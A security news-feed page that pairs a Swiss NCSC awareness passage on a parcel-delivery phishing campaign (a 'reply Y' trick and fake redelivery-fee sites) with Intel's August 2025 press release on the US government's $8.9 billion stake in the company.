“iMessage” and group messages with a title
A particularly insidious aspect of this method lies in the way the messages are presented. The scammers use an RCS feature that allows group messages to be given a custom name. Victims thus receive a notification giving the impression that they have been added to an official group such as “Postal delivery information”. This looks far more legitimate than a plain message from an unknown foreign number and lowers the recipients' inhibition threshold.

The criminals also use a trick to bypass the security measures built into smartphones. Modern operating systems disable links contained in messages from unknown senders, to prevent users from accidentally reaching phishing sites. The fraudsters therefore ask victims to reply “Y” to the message. The operating system interprets this action as a sign of trust, after which the previously inactive malicious link is activated and can be clicked. The scammers thereby induce their victims to actively reduce the security of their own device.

The whole campaign is designed to psychologically manipulate people. By imitating well-known brands such as “Swiss Post”, it exploits the authority principle. You will find more information on this principle in weekly review 31/2025. At the same time, the messages create enormous pressure by using wording such as “the delivery could not be completed” and by setting very short deadlines for a supposed redelivery. This urgency is intended to prevent rational reflection and push recipients to act impulsively. Clicking the link redirects the user to a professionally designed fake version of the parcel delivery service's official website. Under the pretext of a minimal redelivery fee, the site then asks for credit card details and other personal information.

ncsc.admin.ch FR 2025 arnaque SMS PosteSuisse DPD iMessage campagne phishing
Intel and Trump Administration Reach Historic Agreement to Accelerate American Technology and Manufacturing Leadership https://www.intc.com/news-events/press-releases/detail/1748/intel-and-trump-administration-reach-historic-agreement-to
25/08/2025 11:55:23

Intel Corporation (INTC) www.intc.com Aug 22, 2025 • 4:53 PM EDT

U.S. Government to make $8.9 billion investment in Intel common stock as company builds upon its more than $100 billion expansion of resilient semiconductor supply chain

SANTA CLARA, Calif.--(BUSINESS WIRE)-- Intel Corporation today announced an agreement with the Trump Administration to support the continued expansion of American technology and manufacturing leadership. Under terms of the agreement, the United States government will make an $8.9 billion investment in Intel common stock, reflecting the confidence the Administration has in Intel to advance key national priorities and the critically important role the company plays in expanding the domestic semiconductor industry.

The government’s equity stake will be funded by the remaining $5.7 billion in grants previously awarded, but not yet paid, to Intel under the U.S. CHIPS and Science Act and $3.2 billion awarded to the company as part of the Secure Enclave program. Intel will continue to deliver on its Secure Enclave obligations and reaffirmed its commitment to delivering trusted and secure semiconductors to the U.S. Department of Defense. The $8.9 billion investment is in addition to the $2.2 billion in CHIPS grants Intel has received to date, making for a total investment of $11.1 billion.

“As the only semiconductor company that does leading-edge logic R&D and manufacturing in the U.S., Intel is deeply committed to ensuring the world’s most advanced technologies are American made,” said Lip-Bu Tan, CEO of Intel. “President Trump’s focus on U.S. chip manufacturing is driving historic investments in a vital industry that is integral to the country’s economic and national security. We are grateful for the confidence the President and the Administration have placed in Intel, and we look forward to working to advance U.S. technology and manufacturing leadership.”

“Intel is excited to welcome the United States of America as a shareholder, helping to create the most advanced chips in the world,” said Howard Lutnick, United States Secretary of Commerce. “As more companies look to invest in America, this administration remains committed to reinforcing our country’s dominance in artificial intelligence while strengthening our national security.”

Under the terms of today’s announcement, the government agrees to purchase 433.3 million primary shares of Intel common stock at a price of $20.47 per share, equivalent to a 9.9 percent stake in the company. This investment provides American taxpayers with a discount to the current market price while enabling the U.S. and existing shareholders to benefit from Intel’s long-term business success.

The government’s investment in Intel will be a passive ownership, with no Board representation or other governance or information rights. The government also agrees to vote with the Company’s Board of Directors on matters requiring shareholder approval, with limited exceptions.

The government will receive a five-year warrant, at $20 per share for an additional five percent of Intel common shares, exercisable only if Intel ceases to own at least 51% of the foundry business.

The existing claw-back and profit-sharing provisions associated with the government’s previously disbursed $2.2 billion grant to Intel under the CHIPS Act will be eliminated to create permanency of capital as the company advances its U.S. investment plans.

Investing in America’s Future

Intel has continued to strategically invest in research, development and manufacturing in the United States since the company’s founding in 1968. Over the last five years, Intel has invested $108 billion in capital and $79 billion in R&D, the majority of which were dedicated to expanding U.S.-based manufacturing capacity and process technology.

Intel is currently undertaking a significant expansion of its domestic chipmaking capacity, investing more than $100 billion to expand its U.S. sites. The company’s newest chip fabrication site in Arizona is expected to begin high-volume production later this year, featuring the most advanced semiconductor manufacturing process technology on U.S. soil.

Since joining the company as CEO in March, Tan has taken swift actions to strengthen Intel’s financial position, drive disciplined execution and revitalize an engineering-first culture. Today’s agreement supports the company’s broader strategy to position Intel for the future.

Strengthening the U.S. Technology Ecosystem

Intel’s U.S. investments come as many leading technology companies support President Trump’s agenda to achieve U.S. technology and manufacturing leadership.

Intel is deeply engaged with current and potential customers and partners who share its commitment to building a strong and resilient U.S. semiconductor supply chain.

Satya Nadella, Chairman and Chief Executive Officer, Microsoft: “The decades-long partnership between Microsoft and Intel has pioneered new frontiers of technology and showcased the very best of American ingenuity and innovation. Intel’s continued investment in strengthening the U.S. semiconductor supply chain, supported by President Trump’s bold strategy to rebuild this critical industry on American soil, will benefit the country and broader technology ecosystem for years to come.”

Michael Dell, Chairman and Chief Executive Officer, Dell Technologies: “The industry needs a strong and resilient U.S. semiconductor industry, and no company is more important to this mission than Intel. It’s great to see Intel and the Trump Administration working together to advance U.S. technology and manufacturing leadership. Dell fully supports these shared priorities, and we look forward to bringing a new generation of products to market powered by American-designed and manufactured Intel chips.”

Enrique Lores, President and CEO, HP: “We share Intel’s and the Trump Administration’s deep commitment to building a strong, resilient and secure U.S. semiconductor industry. Intel’s continued investment in domestic R&D and manufacturing is integral to future innovation and will strengthen the partnership between HP and Intel for years to come. This is a defining moment for great American companies to lead the world in cutting-edge technologies that will shape the future.”

Matt Garman, AWS CEO: “Leading-edge semiconductors are the bedrock of every AI technology and cloud platform, making U.S. investment in this critical industry one of the most important technological, economic and national security imperatives of our time. Intel plays a vital role as one of the country’s leading chip manufacturers, and we applaud the Trump administration’s efforts to usher in a new era of American innovation in partnership with American companies.”

PJT Partners acted as Intel’s exclusive financial advisor in connection with this investment agreement.

About Intel

Intel (Nasdaq: INTC) is an industry leader, creating world-changing technology that enables global progress and enriches lives. Inspired by Moore’s Law, we continuously work to advance the design and manufacturing of semiconductors to help address our customers’ greatest challenges. By embedding intelligence in the cloud, network, edge and every kind of computing device, we unleash the potential of data to transform business and society for the better. To learn more about Intel’s innovations, go to newsroom.intel.com and intel.com.

Forward-Looking Statements

This release contains forward-looking statements, including with respect to: the agreement with the U.S. government and its expected benefits, including the anticipated timing of closing and impacts to Intel’s existing agreements with the U.S. government under the CHIPS Act; Intel’s investment plans, including in manufacturing expansion projects and R&D; and the anticipated production using Intel’s latest semiconductor process technology in Arizona later this year. Such statements involve many risks and uncertainties that could cause our actual results to differ materially from those expressed or implied, including those associated with: uncertainties as to the timing of the consummation of the transaction and the receipt of funding; Intel’s ability to effectively use the proceeds and realize and utilize the other anticipated benefits of the transaction as contemplated thereby; the availability of appropriations from the legislative branch of the U.S. government and the ability of the executive branch of the U.S. government to obtain funding and support contemplated by the transaction; the determination by the legislative, judicial or executive branches of the U.S. government that any aspect of the transaction was unauthorized, void or voidable; Intel’s ability to obtain additional or replacement financing, as needed; Intel’s ability to effectively assess, determine and monitor the financial, tax and accounting treatment of the transaction, together with Intel’s and the U.S. government’s obligations thereunder; litigation related to the transaction or otherwise; potential adverse reactions or changes to business relationships resulting from the announcement or completion of the transaction; the timing and achievement of expected business milestones; Intel’s ability to effectively comply with the broader legal and regulatory requirements and heightened scrutiny associated with government partnerships and contracts; the high level of competition and rapid technological change in the semiconductor industry; the significant long-term and inherently risky investments Intel is making in R&D and manufacturing facilities that may not realize a favorable return; the complexities and uncertainties in developing and implementing new semiconductor products and manufacturing process technologies; Intel’s ability to time and scale its capital investments appropriately; changes in demand for Intel’s products; macroeconomic conditions and geopolitical tensions and conflicts, including geopolitical and trade tensions between the U.S. and China, the impacts of Russia's war on Ukraine, tensions and conflict affecting Israel and the Middle East, and rising tensions between mainland China and Taiwan; the evolving market for products with AI capabilities; Intel’s complex global supply chain supporting its manufacturing facilities and incorporating external foundries, including from disruptions, delays, trade tensions and conflicts, or shortages; recently elevated geopolitical tensions, volatility and uncertainty with respect to international trade policies, including tariffs and export controls, impacting Intel’s business, the markets in which it competes and the world economy; product defects, errata and other product issues, particularly as Intel develops next-generation products and implements next-generation manufacturing process technologies; potential security vulnerabilities in Intel’s products; increasing and evolving cybersecurity threats and privacy risks; IP risks including related litigation and regulatory proceedings; the need to attract, retain, and motivate key talent; Intel’s debt obligations and its ability to access sources of capital; complex and evolving laws and regulations across many jurisdictions; fluctuations in currency exchange rates; changes in Intel’s effective tax rate; catastrophic events; environmental, health, safety, and product regulations; and other risks and uncertainties described in this release and Intel’s 2024 Form 10-K, Q1 2025 Form 10-Q, Q2 2025 Form 10-Q, and other filings with the SEC. Readers are cautioned not to place undue reliance on these forward-looking statements, which speak only as of the date they were first made. Intel does not undertake, and expressly disclaims any duty, to update such statements, whether as a result of new information, new developments, or otherwise, except to the extent that disclosure may be required by law.

intc.com EN 2025 Trump Intel US Government investment